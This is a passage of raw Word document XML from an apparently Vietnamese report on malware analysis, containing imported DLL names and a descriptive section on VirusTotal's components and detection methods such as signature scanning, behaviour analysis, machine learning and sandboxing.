          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="53BC5C6E" wp14:editId="7C32CA1D">
            <wp:extent cx="3209925" cy="234315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209925" cy="2343150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C37E818" w14:textId="767495CD"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GDI32.DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332033E7" w14:textId="3EC5867C" w:rsidR="00717B9C" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>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4380B8CA" wp14:editId="3C3DF9C5">
            <wp:extent cx="3086100" cy="2828925"/>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3086100" cy="2828925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B15CBC5" w14:textId="77777777" w:rsidR="00717B9C" w:rsidRDefault="00717B9C" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D000EF7" w14:textId="0E3741C6" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+SHELL32.DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464AE99B" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>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30A3D2FC" wp14:editId="17E1CDEA">
            <wp:extent cx="3086100" cy="30194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3086100" cy="3019425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F0AAE9" w14:textId="6397510A" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc150717777"/>
      <w:bookmarkStart w:id="37" w:name="_Toc150718039"/>
      <w:bookmarkStart w:id="38" w:name="_Toc150718126"/>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IV.</w:t>
      </w:r>
      <w:r w:rsidR="00154862">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Phân tích mã động tự động sử dụng Virus Total</w:t>
      </w:r>
      <w:r w:rsidR="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="269E627C" w14:textId="695966E1" w:rsidR="00C41018" w:rsidRPr="00EA0FA7" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc150717778"/>
      <w:bookmarkStart w:id="40" w:name="_Toc150718040"/>
      <w:bookmarkStart w:id="41" w:name="_Toc150718127"/>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.Định nghĩa</w:t>
      </w:r>
      <w:r w:rsidR="00EA0FA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="253502D2"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VirusTotal là một dịch vụ trực tuyến cung cấp khả năng quét và phân tích các tệp và URL để phát hiện các mối đe dọa bảo mật, như phần mềm độc hại và các loại virus khác. Dịch vụ này cho phép người dùng tải lên các tệp hoặc cung cấp URL để VirusTotal kiểm tra chúng bằng nhiều công cụ phân tích khác nhau từ các nhà cung cấp bảo mật khác nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB9E89C" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601D9CF5"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Khi bạn tải lên một tệp hoặc cung cấp một URL, VirusTotal sẽ quét nó thông qua nhiều chương trình chống vi-rút, ứng dụng phát hiện độc hại, và công cụ phân tích khác để xác định liệu tệp hoặc URL đó có chứa mối đe dọa hay không. Sau đó, nó cung cấp cho bạn một bản báo cáo về kết quả quét, cho biết số lượng công cụ phát hiện mối đe dọa, tỷ lệ phát hiện, và thông tin chi tiết về mối đe dọa cụ thể (nếu có).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1B5F9B" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="142FC023"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VirusTotal là một công cụ hữu ích cho người dùng cá nhân, doanh nghiệp và các chuyên gia bảo mật để kiểm tra tính an toàn của các tệp và URL trước khi tải xuống hoặc truy cập chúng. Nó giúp ngăn chặn sự lây lan của phần mềm độc hại và cung cấp thông tin quan trọng về bảo mật để bảo vệ hệ thống và dữ liệu của bạn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EAB7E4" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="759D49A4" w14:textId="1FB45D61" w:rsidR="00C41018" w:rsidRPr="00717B9C" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc150717779"/>
      <w:bookmarkStart w:id="43" w:name="_Toc150718041"/>
      <w:bookmarkStart w:id="44" w:name="_Toc150718128"/>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.Các thành phần</w:t>
      </w:r>
      <w:r w:rsidR="00717B9C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="2E1F120A"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VirusTotal là một dịch vụ phân tích bảo mật trực tuyến mạnh mẽ, được xây dựng từ nhiều thành phần cơ bản để cung cấp khả năng quét và phân tích các tệp và URL để phát hiện các mối đe dọa bảo mật. Dưới đây là các thành phần chính của VirusTotal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903CE0A" w14:textId="6AA52D2D" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Giao diện web: VirusTotal cung cấp một giao diện web trực quan và dễ sử dụng cho người dùng truy cập. Giao diện này cho phép người dùng tải lên tệp hoặc nhập URL để kiểm tra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22044F9E" w14:textId="5DC2FF59" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Hệ thống quét đa công cụ: VirusTotal tích hợp nhiều công cụ quét từ các nhà cung cấp bảo mật khác nhau. Điều này cho phép VirusTotal quét tệp hoặc URL của bạn bằng cách sử dụng nhiều công cụ khác nhau đồng thời, tăng khả năng phát hiện mối đe dọa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6F2F27" w14:textId="1CCAD7AB" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Cơ sở dữ liệu kết quả: VirusTotal duy trì một cơ sở dữ liệu các kết quả quét trước đó để người dùng có thể tra cứu thông tin về các tệp hoặc URL đã được kiểm tra trước đây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36709AF9" w14:textId="2CC088E6" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Báo cáo kết quả: Sau khi quá trình quét hoàn thành, VirusTotal cung cấp báo cáo chi tiết về kết quả, bao gồm số lượng công cụ phát hiện mối đe dọa, tỷ lệ phát hiện, và thông tin chi tiết về mối đe dọa cụ thể nếu có.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3401A8C8" w14:textId="1FD88EF8" w:rsidR="00C41018" w:rsidRPr="00FA3C20" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+API (Application Programming Interface): VirusTotal cung cấp một API mạnh mẽ cho phép các ứng dụng và dịch vụ bên ngoài tích hợp các chức năng của VirusTotal vào ứng dụng của họ. Điều này cho phép tự động hóa việc kiểm tra và phân tích tệp hoặc URL từ các ứng dụng và dịch vụ khác nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB4E2E3"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Tổng cộng, VirusTotal cung cấp một cách tiếp cận toàn diện để kiểm tra tính an toàn của các tệp và URL bằng cách sử dụng nhiều công cụ quét bảo mật khác nhau để đảm bảo tính khả thi và độ chính xác của kết quả quét.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C70FD53" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55B33158" w14:textId="51F17DAF" w:rsidR="00C41018" w:rsidRPr="00FA3C20" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc150717780"/>
      <w:bookmarkStart w:id="46" w:name="_Toc150718042"/>
      <w:bookmarkStart w:id="47" w:name="_Toc150718129"/>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.Phương pháp phát hiện</w:t>
      </w:r>
      <w:r w:rsidR="00FA3C20">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="5678CECA"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VirusTotal sử dụng nhiều phương pháp khác nhau để phát hiện mã độc và mối đe dọa bảo mật trong các tệp và URL. Các phương pháp này bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A202B5" w14:textId="386F8841" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Quét chữ ký: VirusTotal sử dụng cơ sở dữ liệu chữ ký bảo mật để so sánh tệp với các mẫu đã biết của phần mềm độc hại. Nếu tệp trùng khớp với một chữ ký đã biết, nó sẽ được đánh dấu là có mối đe dọa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294EC61A" w14:textId="29CAEBBF" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>+Behavior : VirusTotal sử dụng các kỹ thuật phân tích sư phạm để xem xét các hành vi không bình thường hoặc đáng ngờ trong tệp. Điều này có thể bao gồm việc kiểm tra các hoạt động như thay đổi registry, tạo các tệp tạm thời, hoặc gọi các hàm hệ thống quan trọng. Nếu tệp hiện ra có dấu hiệu của hành vi độc hại, nó sẽ được đánh dấu là có mối đe dọa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E12A019" w14:textId="68C2D8D3" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Machine Learning : VirusTotal sử dụng các mô hình học máy để phân tích các đặc điểm của tệp và xác định liệu chúng có thể là mã độc hay không. Mô hình học máy này dựa trên dữ liệu lớn được thu thập từ các mẫu phần mềm độc hại trước đó và từ các tệp an toàn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B94B1F4" w14:textId="1604F9B6" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Quét đám mây : VirusTotal có thể liên kết với các dịch vụ lưu trữ đám mây để quét các tệp được tải lên từ các dịch vụ này. Điều này giúp phát hiện mối đe dọa từ các tệp trong môi trường đám mây, chẳng hạn như email hoặc lưu trữ tệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9F8256" w14:textId="59D7D0AC" w:rsidR="00C41018" w:rsidRPr="00FA3C20" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00FA3C20">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hân tích động : VirusTotal có thể chạy các tệp trong môi trường cách ly để xem họ hoạt động như thế nào và xem xét các hoạt động độc hại. Điều này giúp phát hiện các mối đe dọa dựa trên hành vi của tệp thay vì chỉ dựa trên các chữ ký đã biết.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78581559"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Kết hợp các phương pháp này giúp VirusTotal có khả năng phát hiện mối đe dọa bảo mật đa dạng và làm tăng độ chính xác trong việc xác định tính an toàn của các tệp và URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6637FE20" w14:textId="4AD6EA3C" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="004B18B1"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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20B116F8" wp14:editId="18C7205A">
            <wp:extent cx="5733415" cy="2476500"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="2119216322" name="Picture 2" descr="VirusTotal Is Getting a New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usTotal Is Getting a New UI"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId27">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="31937"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415"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0D1D0924" w14:textId="476D4C46" w:rsidR="00C41018" w:rsidRPr="00FA3C20" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc150717781"/>
      <w:bookmarkStart w:id="49" w:name="_Toc150718043"/>
      <w:bookmarkStart w:id="50" w:name="_Toc150718130"/>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.Tổng quan về engines</w:t>
      </w:r>
      <w:r w:rsidR="00FA3C20">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
